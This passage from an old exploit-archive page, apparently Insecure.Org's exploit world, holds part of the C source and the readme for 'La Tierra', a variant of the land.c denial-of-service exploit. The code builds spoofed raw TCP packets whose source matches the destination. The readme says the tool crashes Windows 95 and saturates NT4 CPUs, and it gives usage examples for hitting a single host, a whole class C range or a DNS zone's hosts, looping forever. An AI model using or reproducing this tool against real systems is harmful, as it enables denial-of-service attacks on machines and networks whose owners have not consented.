     buff[strlen(buff)-1] = 0x0;
    return 1;
    }
  }
 return 0;
}
/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
 register long value;
 u_short i;
 for(i = 0; i< (length >> 1); i++)
  value += data[i];
 if((length & 1)==1)
  value += (data[i] << 8);
 value = (value & 0xFFFF) + (value >> 16);
 return(~value);
}
/********/
/* land */
/********/
int land(LATIERRA_DATA *ld,  int port_number)
{
 struct sockaddr_in sin;
   int sock;
   char buffer[40];
   struct iphdr * ipheader = (struct iphdr *) buffer;
   struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
   struct pseudohdr pseudoheader;
 bzero(&sin,sizeof(struct sockaddr_in));
   sin.sin_family=AF_INET;
   if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
    {
      printf("ERROR: unknown host %s\n", ld->dest_ip);
      return(-1);
      }
 if((sin.sin_port=htons(port_number))==0)
    {
      printf("ERROR: unknown port %s\n",port_number);
      return(-2);
      }
 if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
    {
      printf("ERROR: couldn't allocate raw socket\n");
      return(-3);
      }
 bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->version=4;
   ipheader->ihl=sizeof(struct iphdr)/4;
   ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->id=htons(ld->sequence_number);
   ipheader->ttl = ld->ttl;
   ipheader->protocol = ld->ip_protocol;
   ipheader->saddr=sin.sin_addr.s_addr;
   ipheader->daddr=sin.sin_addr.s_addr;
   tcpheader->th_sport = sin.sin_port;
   tcpheader->th_dport = sin.sin_port;
   tcpheader->th_seq = htonl(ld->sequence_number);
   tcpheader->th_flags = ld->tcp_flags;
   tcpheader->th_off = sizeof(struct tcphdr)/4;
   tcpheader->th_win = htons(ld->window_size);
   bzero(&pseudoheader,12+sizeof(struct tcphdr));
   pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.protocol = ld->ip_protocol;
   pseudoheader.length = htons(sizeof(struct tcphdr));
   bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
   tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
   if( sendto(sock,  buffer,
       sizeof(struct iphdr)+sizeof(struct tcphdr),
       ld->message_type,
       (struct sockaddr *) &sin,
       sizeof(struct sockaddr_in) )==-1)
    {
      printf("ERROR: can't send packet. (sendto failed)\n");
      return(-4);
      }
 if(!ld->supress_output)
  printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
   close(sock);
   return(0);
}
/* End of land */
void alternatives()
{
 printf("\nAlternative command line arguments for option -i\n\n");
 printf("    You can create two types of files that latierra can use to get\n");
 printf("    a list of IP addresses, a simple ASCII file with each IP address\n");
 printf("    appearing on each line or better yet, a DNS zone file created by\n");
 printf("    nslookup.  If you are unfamiliar with nslookup, specify a '-n' on the\n");
 printf("    command line of latierra.\n\n");
 printf("    Basically, latierra will walk down the list and send the spoofed packet\n");
 printf("    to each IP address.  Once the list is complete, and loop > 1, the list\n");
  printf("    is repeated.   To specify that the '-i' option should use a zone file,\n");
 printf("    specify \"zone=filename.txt\" instead of an IP address.  To specify a \n");
 printf("    simple ASCII list of IP addresses, use \"list=filename.txt\".  Lines\n");
 printf("    beginning with ';' or '[' are ignored.  Lines that are not an 'A' \n");
 printf("    record (second column)in a zone file will ignored.\n\n");
 exit(-1);
}
void nslookup_help()
{
 printf("\nNSLOOKUP help\n\n");

 printf("To see who is the DNS server for a particular domain, issue the following:\n");
 printf("        > set type=ns\n");
 printf("        > xyz.com\n\n");
 printf("  You will see a list of the name server(s) if completed successfully\n\n");
 printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
 printf("and issue the following commands:\n");
 printf("         > server 1.1.1.1\n");
 printf("         > ls -d xyz.com > filename.txt\n\n");
 printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
 printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
 exit(-1);
}
void protocol_list()
{
 printf("\nProtocol List:\n\n");
 printf("Verified:\n");
 printf("1-ICMP   2-IGMP   3-GGP  5-ST   6-TCP   7-UCL   8-EGP   9-IGP  10-BBN_RCC_MON\n");
 printf("11-NVP11   13-ARGUS   14-EMCON   15-XNET   16-CHAOS   17-UDP   18-MUX\n");
 printf("19-DCN_MEAS   20-HMP   21-PRM   22-XNS_IDP   23-TRUNK1   24-TRUNK2\n");
 printf("25-LEAF1   26-LEAF2    27-RDP   28-IRTP      29-ISO_TP4  30-NETBLT\n");
 printf("31-MFE_NSP   32-MERIT_INP   33-SEP   34-3PC   62-CFTP    64-SAT_EXPAK\n");
 printf("66-RVD       67-IPPC        69-SAT_MON   70-VISA         71-IPCV\n");
 printf("76-BR_SAT_MON   77-SUN_ND   78-WB_MON   79-WB_EXPAK   80-ISO_IP\n");
 printf("81-VMTP   82-SECURE_VMTP   83-VINES  84-TTP   85-NSFNET_IGP   86-DGP\n");
 printf("87-TCF    88-IGRP          89-OSPFIGP         90-SPRITE_RPG   91-LARP\n\n");
 printf("Supported:\n");
 printf("    6-TCP     17-UDP    (future: PPTP, SKIP) \n\n");
 exit(-1);
}
void print_arguments()
{
 printf("Arguments: \n");
 printf("     *   -i dest_ip = destination ip address such as 1.1.1.1\n");
 printf("                If last octet is '-', then the address will increment\n");
 printf("                from 1 to 254 (Class C) on the next loop\n");
 printf("                and loop must be > 1 or %d (forever).\n", FOR_EVER);
 printf("                Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
 printf("                For list of alternative options, use  -a instead of -h.\n");
 printf("     *   -b port# = beginning port number (required).\n");
        printf("         -e port# = ending port number (optional)\n");
 printf("         -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
 printf("         -v = time_to_live value, default=%d\n", DEFAULT_TTL);
 printf("         -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
 printf("         -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
 printf("         -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
 printf("         -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
 printf("         -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
 printf("         -o 1 = supress additional output to screen, default=0\n" );
 printf("         -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
 printf("     * = required     ~ = default parameter values\n\n");
 exit(-1);
}
/* End of file */

----------------- readme.txt  ------------------------------
La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net
       Modified version of land.c by m3lt, FLC
To compile latierra, type:
 gcc latierra.c -o latierra
 To see the help screen, use 'latierra -h'
This program crashes Windows 95, and will cause Windows NT
4.0, SP3 to utilize a high percentage of CPU.  In some
instances, CPU usage reaches %100.

land.c description:
land.c sends a spoofed packet with the SYN flag from the
the same IP and port number as the destination.  For
example, if you want to do a DoS on 1.1.1.1, port 80, it would
spoof 1.1.1.1 port 80 as the source.  The problem is with
NT4 SP3, however, is once you issue this packet to a
port, NT4 SP3 appears to ignore all other attempts -
UNTIL ...

                     La Tierra!

La Tierra description:

La Tierra basically works by sending NT the same packet
used in land.c but to more than one port (if specified).
It doesn't appear to matter if the port is opened or closed!
NT doesn't appear to let this happen again on the same port
successively, but you simply change ports, and you can easily
go back to the original port and it'll work again. What's even
more interesting is the fact that port 139 works with this.
You would have thought - I'll leave that alone for now!
While testing, I used a Compaq dual Intel Pentium Pro 200, and
was able to take up to %64 CPU.  With one processor disabled,
CPU usage was %100.  NT4 SP3 doesn't seem to crash, just needs
time to recover, even with one spoofed packet.
Features include:
 - Ability to launch a DoS on an entire class C address
 - Specify the beginning and ending port range
 - Specify the number of loops or make it loop forever!
 - User defined TCP flags: fin, syn, reset, push, ack,
   and urgent
 - Other IP options such as window size, time-to-live,
   sequence_number, and message_type
 - Ability to read a DNS zone file for IP addresses
 - Ability to read a ASCII file containing IP addresses
Command line options:
     - i ip_address
 DEFAULT: None
 RANGE: Valid IP Address
 OPTIONAL: No
 where ip_address is a valid ip_address, or if you wish to
 cycle through a class C address, the last octet is dropped
        and replaced with a '-'.  This option is required.  The
 source and destination address are obtained from this value.
 Rather than specifying an IP address, you may wish to create
        an ASCII file, or better yet, use nslookup to obtain all
        zone information for a particular domain.  The ASCII file
 simply contains a list of IP addresses, one on each line.
 To get a DNS file, simply use nslookup, and the
 "ls -d somedomain.com > filename.txt" command.  You can use
 'latierra -n' to read more about the command sequence for
 nslookup.
 In both types of files, lines that begin with ';' or '[' are
 ignored. In DNS files, only 'A' records are processed.
 Examples:
    Single IP Address:
  -i 10.1.2.1
    Class C range:
  -i 10.1.2.-
    ASCII file:
  -i list=filename.txt
    DNS file:
  -i zone=filename.txt
     -b beginning_port_number
 DEFAULT: None
 RANGE: Positive Integer
 OPTIONAL: No
 where this value is the port_number that latierra will use. If
 no ending_port_number is specified, ending_port_number is then
 equal to this value.  Valid range is 1 to 0xFFFF
     -e ending_port_number
 DEFAULT: If not specified, equal to beginning_port_number
 RANGE: Positive Integer
 OPTIONAL: Yes
 is the highest port number in the range to cycle through.
 Example:
  -i 10.1.2.1 -b 23 -e 80
 will start at port 23 and increment up to port 80.  You can
        delay the next increment by using the -s option.  Valid range
 is 1 to 0xFFFF
     -s seconds_between_spoofs
 DEFAULT: 1
 RANGE: Positive Integer
 OPTIONAL: Yes
 You may want to control the seconds between spoofs.  If you
        specify a zero, no delays occur.
 In the below example, the spoof will between ports 23 and 80,
 every 3 seconds.
  -i 10.1.2.1 -b 23 -e 80 -s 3
     -l number_of_loops

 DEFAULT: 1
 RANGE: Positive Integer, -5 loops forever
 OPTIONAL: Yes

 This option if set greater than 1, will cause a repeat of the
        cycle.  For example:
  -i 10.1.2.1 -b 23 -e 80 -s 0 -l 8
 will cause latierra to go through ports 23 through 80 and
 repeat the process 8 times, with no delay.  Look at the
 following example:
  -i 10.1.2.- -b 23 -e 80 -s 0 -l 8
 latierra will start at 10.1.2.1, port 23 through 80, then
 increment to 10.1.2.2, port 23 through 80, and so on until
 it gets to 10.1.2.254, in which case it will repeat the
 same procedure over again 8 times.
 By specifying a value of -5 for this option, latierra will
 loop forever, until you manually stop the process.  In the
 last example above, the procedure would never end.  When it
 reaches 10.1.2.254, it falls back to 10.1.2.1 and start
 over again from there.
 Other examples:
  -i 10.1.2.1 -b 139 -s 0 -l -5
  -i 10.1.2.- -b 80 -s 5 -l 10

     -t tcp_flags
 DEFAULT: sp   (SYN, PUSH)
 RANGE: valid character set (see below)
 OPTIONAL: Yes
 this option sets the various TCP flags, which include:
  f = fin  s = syn  r = reset
  p = push a = ack  u = urgent
 Example:
  -i 10.1.2.1 -b 139 -t apu -s 0
  To set the ack, push, and urgent flag
     -v time_to_live_value
 DEFAULT: 0xFF (255 decimal)
 RANGE: Positive Integer
 OPTIONAL: Yes
 Sets the time to live value.
     -p protocol_value
 DEFAULT: 6 (tcp)
 RANGE: Positive Integer
 OPTIONAL: Yes
 Sets the protocol value in the IP header.  To see a list of
  available protocols, run "latierra -p".
     -w window_size_value
 DEFAULT: 0xFFFF (65000 decimal)
 RANGE: Positive long value
 OPTIONAL: Yes
     -q tcp_sequence_number_value
 DEFAULT: 0xF1C
 RANGE: Positive integer
 OPTIONAL: Yes
     -o 1 supress_additional_output
 DEFAULT: messages are printed for status
 RANGE: None
 OPTIONAL: Yes
 If you don't want to see the messages during the process,
 simply use this "-o 1" to turn them off.
Final Note:
Please use this program for in-house testing purposes only.
Just because your sending spoofed packets, doesn't mean you
can't be traced.
Good luck.
- MondoMan
elmondo@usa.net

-------------------- end of file -------------------------------



More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: